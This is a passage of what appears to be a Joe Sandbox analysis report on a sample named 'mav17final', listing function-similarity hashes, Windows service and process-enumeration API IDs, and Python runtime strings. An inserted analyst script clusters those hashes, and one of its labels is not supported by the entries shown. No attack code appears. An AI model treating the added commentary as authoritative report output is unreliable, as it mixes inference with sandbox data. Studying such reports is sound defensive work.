                                                  • Opcode ID: 69d60d9dbdd8ec2d5bf58629b4a48261e78ee53a16a54b6d80c68b59adc8361e
                                                  • Instruction ID: 63544ed73ec0ea3adf3cb363ed69b9cf08c6824d458fe7faa089cc13bff81409
                                                  • Opcode Fuzzy Hash: 69d60d9dbdd8ec2d5bf58629b4a48261e78ee53a16a54b6d80c68b59adc8361e
                                                  • Instruction Fuzzy Hash: C6F0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$stop_pending
                                                  • API String ID: 1635794000-1930585124
                                                  • Opcode ID: aa3ce652e4b677457338b6e4e0f80e49c9735d5b2f46fce735b5f0bc3fff0f68
                                                  • Instruction ID: da961c6f4ee6efbd2fb5a048b1bf792a77ef32459732e0e089b16a69641ffd87
                                                  • Opcode Fuzzy Hash: aa3ce652e4b677457338b6e4e0f80e49c9735d5b2f46fce735b5f0bc3fff0f68
                                                  • Instruction Fuzzy Hash: E0F0FE65A1DACA82EE549F2AA8441792B61FF69BD0B444031CB0E53764FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$start_pending
                                                  • API String ID: 1635794000-2023969894
                                                  • Opcode ID: 6c3dba55e4dc3c92f303421457c3adfc7bc9e37ec762d46887103224b74ffac9
                                                  • Instruction ID: 19942e95435c5cb747eb97254f09590c5c983a4884e70ed29ac61242fa97ab4c
                                                  • Opcode Fuzzy Hash: 6c3dba55e4dc3c92f303421457c3adfc7bc9e37ec762d46887103224b74ffac9
                                                  • Instruction Fuzzy Hash: DCF0FE65B1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$pause_pending
                                                  • API String ID: 1635794000-461645825
                                                  • Opcode ID: e930fa1490d80a1d0b7ebf7151a2a24f89806df4858d55e13bc7a9c2c43a1c6e
                                                  • Instruction ID: b53af794e0529c9676e5a2d396d973938191f91b08d952fea89a06476f4f5e9f
                                                  • Opcode Fuzzy Hash: e930fa1490d80a1d0b7ebf7151a2a24f89806df4858d55e13bc7a9c2c43a1c6e
                                                  • Instruction Fuzzy Hash: 29F0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$stopped
                                                  • API String ID: 1635794000-1133211610
                                                  • Opcode ID: 9952a2a7288f01b77486e9298497a4f1071da980eccecb961b403a252d8b28ef
                                                  • Instruction ID: c351a27f5e8b59315e1a5da4495633e15242335fa9ff502ee4da17f1a7d8cb5d
                                                  • Opcode Fuzzy Hash: 9952a2a7288f01b77486e9298497a4f1071da980eccecb961b403a252d8b28ef
                                                  • Instruction Fuzzy Hash: E4F0FE65A1DACA92EE549F2AA8441792B61FFA9BD0B444031CB0E53724FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$running
                                                  • API String ID: 1635794000-3389828697
                                                  • Opcode ID: 1c499720f40224fe23ebafe975b4e094db0f6821e757cc22a1c7d8ecb081f0c6
                                                  • Instruction ID: 4db28ef4b714c19e6a805e3c158e5474841a0864ea2bccb96fd414fbcdce44bb
                                                  • Opcode Fuzzy Hash: 1c499720f40224fe23ebafe975b4e094db0f6821e757cc22a1c7d8ecb081f0c6
                                                  • Instruction Fuzzy Hash: DEF0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$paused
                                                  • API String ID: 1635794000-3190322518
                                                  • Opcode ID: 28ebe4222c3f474a120c97e70327d6c2be0a5db68931ab52e3c424a5b25c4f5e
                                                  • Instruction ID: e48acb1eca8e1fe8f90a4162a51a10179474fa3d3f5e916f95ad8345edbfe446
                                                  • Opcode Fuzzy Hash: 28ebe4222c3f474a120c97e70327d6c2be0a5db68931ab52e3c424a5b25c4f5e
                                                  • Instruction Fuzzy Hash: 58F0FE65A1EACA82EE549F2AA8441792B61BF69BD0B444031CB0E53724FE2CE8078700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditParseSys_Tuple
                                                  • String ID: (O)$O&:PyObj_FromPtr$ctypes.PyObj_FromPtr
                                                  • API String ID: 3491098224-1450318991
                                                  • Opcode ID: 2bb121435f85e257f9b1056af5b6aad70d99910b320661e3d929a3a09f6eb257
                                                  • Instruction ID: 58c485750a27af312c114e10035b7a1ef580a21c59dd8319773542b954eeeced
                                                  • Opcode Fuzzy Hash: 2bb121435f85e257f9b1056af5b6aad70d99910b320661e3d929a3a09f6eb257
                                                  • Instruction Fuzzy Hash: CAF0F861B09EC792EE098F59EC801A92770FF46BEAFA05032D70D47364DE6DE506D750
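The seven entries above that share the API ID Heap$CloseFreeHandleProcessService differ only in their String ID (one Windows service state name each) and in a few hex digits of their Instruction Fuzzy Hash, while the ctypes entry (Arg_AuditParseSys_Tuple) and the Toolhelp32 process-walk entry are far from all of them. The following is an added example, not part of the Joe Sandbox report, that clusters the report's own Instruction Fuzzy Hashes to make that relationship explicit. It assumes the hash is a fixed-width hex string whose positions line up across functions, so a positional nibble distance is a usable similarity proxy; Joe Sandbox's actual similarity metric is not documented on this page, and the labels and threshold are this example's own choices.

```python
# Added example: cluster the Instruction Fuzzy Hashes listed in the report above.
# Assumption (not documented on this page): the hash is a fixed-width hex string
# in which equal positions describe equal instruction features, so a positional
# nibble Hamming distance is a usable proxy for function similarity. Joe Sandbox's
# real similarity computation may differ; this is an analyst-side approximation.
from itertools import combinations

# Instruction Fuzzy Hashes copied from the report entries; the labels are ours.
REPORT_HASHES = {
    "continue_pending":     "C6F0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700",
    "stop_pending":         "E0F0FE65A1DACA82EE549F2AA8441792B61FF69BD0B444031CB0E53764FE2CE8078700",
    "start_pending":        "DCF0FE65B1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700",
    "pause_pending":        "29F0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700",
    "stopped":              "E4F0FE65A1DACA92EE549F2AA8441792B61FFA9BD0B444031CB0E53724FE2CE8078700",
    "running":              "DEF0FE65A1DACA82EE549F2AA8441792B61BF69BD0B444031DB0E53764FE2CE8078700",
    "paused":               "58F0FE65A1EACA82EE549F2AA8441792B61BF69BD0B444031CB0E53724FE2CE8078700",
    "ctypes PyObj_FromPtr": "CAF0F861B09EC792EE098F59EC801A92770FF46BEAFA05032D70D47364DE6DE506D750",
    "Toolhelp32 walk":      "48516F32A0DAC286EF259F39E8582793BA1AFA5BF1F084130CB4E06751DE3CD406C700",
}


def nibble_distance(a: str, b: str) -> int:
    """Number of hex-digit positions at which two equal-width hashes differ."""
    a, b = a.upper(), b.upper()
    if len(a) != len(b):
        raise ValueError("fuzzy hashes must have the same width to be compared")
    return sum(x != y for x, y in zip(a, b))


def cluster(hashes: dict, max_distance: int) -> list:
    """Single-linkage clustering over the hashes: two entries end up in the same
    cluster when a chain of pairs with distance <= max_distance connects them.
    Returns a sorted list of sorted label lists (one list per cluster)."""
    parent = {label: label for label in hashes}

    def find(label):
        # Union-find root lookup with path halving.
        while parent[label] != label:
            parent[label] = parent[parent[label]]
            label = parent[label]
        return label

    for x, y in combinations(hashes, 2):
        if nibble_distance(hashes[x], hashes[y]) <= max_distance:
            parent[find(x)] = find(y)

    groups = {}
    for label in hashes:
        groups.setdefault(find(label), []).append(label)
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    # The seven service-state functions fall into one cluster; the ctypes and
    # Toolhelp32 functions stay on their own, which is what the listing implies.
    for group in cluster(REPORT_HASHES, max_distance=8):
        print(len(group), group)
```

Read as a triage aid: the service-state entries are one function body emitted once per string constant (the `(sk)` format with a state name), so a Yara or hash-based rule keyed on any one of them covers the whole family, whereas the ctypes and Toolhelp32 entries need their own coverage.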
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 1789362936-0
                                                  • Opcode ID: 0784bc1d57fe5a9c13eaabd08f0a58926af21919cae235002023a4e4d4517699
                                                  • Instruction ID: 54ea4d9961abb25e71da16ccfd7c8348fc95fe4eae03bbdd427ece2da0b8a6c6
                                                  • Opcode Fuzzy Hash: 0784bc1d57fe5a9c13eaabd08f0a58926af21919cae235002023a4e4d4517699
                                                  • Instruction Fuzzy Hash: 48516F32A0DAC286EF259F39E8582793BA1AFA5BF1F084130CB4E06751DE3CD406C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::$Name::operator+
                                                  • String ID:
                                                  • API String ID: 826178784-0
                                                  • Opcode ID: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
                                                  • Instruction ID: bdacc52f4998745887ff86f5c9459f45d424d61b7d883c6203c1accf0075e004
                                                  • Opcode Fuzzy Hash: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
                                                  • Instruction Fuzzy Hash: 25417922A18A9794FB10CB6AD9901BC3BA4BB15FC4B5880B2EF5D13395EF3CE415E300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocDict_Item
                                                  • String ID:
                                                  • API String ID: 1953171116-0
                                                  • Opcode ID: 3e79e8a0ec8c6a2242c0b13afb3047cb975f84468eaa628f38e07b0f45846962
                                                  • Instruction ID: a50ce624c34d71c751dbb7bc63744ede5e5248a6a2704e75b795408a76b3831a
                                                  • Opcode Fuzzy Hash: 3e79e8a0ec8c6a2242c0b13afb3047cb975f84468eaa628f38e07b0f45846962
                                                  • Instruction Fuzzy Hash: 31213E61A1DBC282FA588F2DED5413976A0AF8ABF6F186134EB4E47795DF6CE440C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: List_$DeallocItem
                                                  • String ID:
                                                  • API String ID: 1559017468-0
                                                  • Opcode ID: ca1c250aef14b2cb80a943dd37ef050920af6dc516bc50837cea6f6d33c8ee49
                                                  • Instruction ID: 3195c1fe26d61551f77137e3bd309be90fab285b2f410d054acab2b934616a91
                                                  • Opcode Fuzzy Hash: ca1c250aef14b2cb80a943dd37ef050920af6dc516bc50837cea6f6d33c8ee49
                                                  • Instruction Fuzzy Hash: 8D216931B1CA9286EA108F6AA50426977A0FF48BC1F484536CB4E87754DF3DE566C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_$DeallocObject_$AttrCallContainsErr_ErrorItemMakeOccurredUpdateWith
                                                  • String ID:
                                                  • API String ID: 3953964043-0
                                                  • Opcode ID: 83de81b2cdb9a0b5f02c82c61faec42d8a7f4e94c71193b3e965a821689d7666
                                                  • Instruction ID: cd86f323c457506bfe37afd8865a3a5b2920a827ea4ecbda6a4845251ca496ce
                                                  • Opcode Fuzzy Hash: 83de81b2cdb9a0b5f02c82c61faec42d8a7f4e94c71193b3e965a821689d7666
                                                  • Instruction Fuzzy Hash: 23211721A09BC291EA458F6DE9401B927A0AF45BE6F48A135DB8D477A4EF3CF485C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID:
                                                  • API String ID: 3617616757-0
                                                  • Opcode ID: abd2609812ce25a27d1ac097890b043a0477b61f164c4d0ec192c4a938d68858
                                                  • Instruction ID: ae48b71e80e6f66501b433c2a0480a17c6f06ed1ae40084e2411894ef2085e2a
                                                  • Opcode Fuzzy Hash: abd2609812ce25a27d1ac097890b043a0477b61f164c4d0ec192c4a938d68858
                                                  • Instruction Fuzzy Hash: F621EA72E09B8284FF95AF78D81437822B8EF56BBAF186034CB4E89785CF2D6545D310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_$FromModuleSpecTypeType_$State
                                                  • String ID:
                                                  • API String ID: 1138651315-0
                                                  • Opcode ID: 61a4d07700435b38e5979996beba01b9920bec42d73c56830fb738b2919386a3
                                                  • Instruction ID: 48f9f0078286860a344894121c7ba705a8a8d83905a989fc4b3f1e70f7233cdf
                                                  • Opcode Fuzzy Hash: 61a4d07700435b38e5979996beba01b9920bec42d73c56830fb738b2919386a3
                                                  • Instruction Fuzzy Hash: 62017521B1AB8281EE548F5AB55833A63B9BF48BD0B548535DF5D47B64EF3CE04AC700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallObject_$DeallocDict_Err_ErrorItemOccurredWith
                                                  • String ID:
                                                  • API String ID: 4058657591-0
                                                  • Opcode ID: 1a35c4ab6dce3baf8b5148636fef7374f6697dae909102b08545470e9d818853
                                                  • Instruction ID: 338205961e782591d771dda3203368910087664ee214d47764c1e127af756c27
                                                  • Opcode Fuzzy Hash: 1a35c4ab6dce3baf8b5148636fef7374f6697dae909102b08545470e9d818853
                                                  • Instruction Fuzzy Hash: 28014F61B0AB8381EF585F2AED181395291AF69FE2F1DA035CB4E47754DE3CE440D310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func
                                                  • String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
                                                  • API String ID: 711238415-3357347091
                                                  • Opcode ID: 943b634fa9d07ff961db70dbb74d68f24273f83e3e6fcba7a578889a90a7400e
                                                  • Instruction ID: 39e69bb5f4a6a21947f66bb4efb0ec0210a8471dbc2008da6e338abbd0825069
                                                  • Opcode Fuzzy Hash: 943b634fa9d07ff961db70dbb74d68f24273f83e3e6fcba7a578889a90a7400e
                                                  • Instruction Fuzzy Hash: 8D61723671829297EB10AE1EA4496A97771BB49BC4F545034DF4A0B796CE3DE44BCB00
                                                  APIs
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244407
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort
                                                  • String ID: $csm$csm
                                                  APIs
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244157
                                                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BA244167
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                  • String ID: csm$csm
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind
                                                  • String ID: csm$f
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::
                                                  • String ID: %lf
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$Err_InstanceStringSubclass
                                                  • String ID: abstract class
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_Stringmemcpy
                                                  • String ID: abstract class
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseControlHandle
                                                  • String ID: ControlService
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  Joe Sandbox IDA Plugin
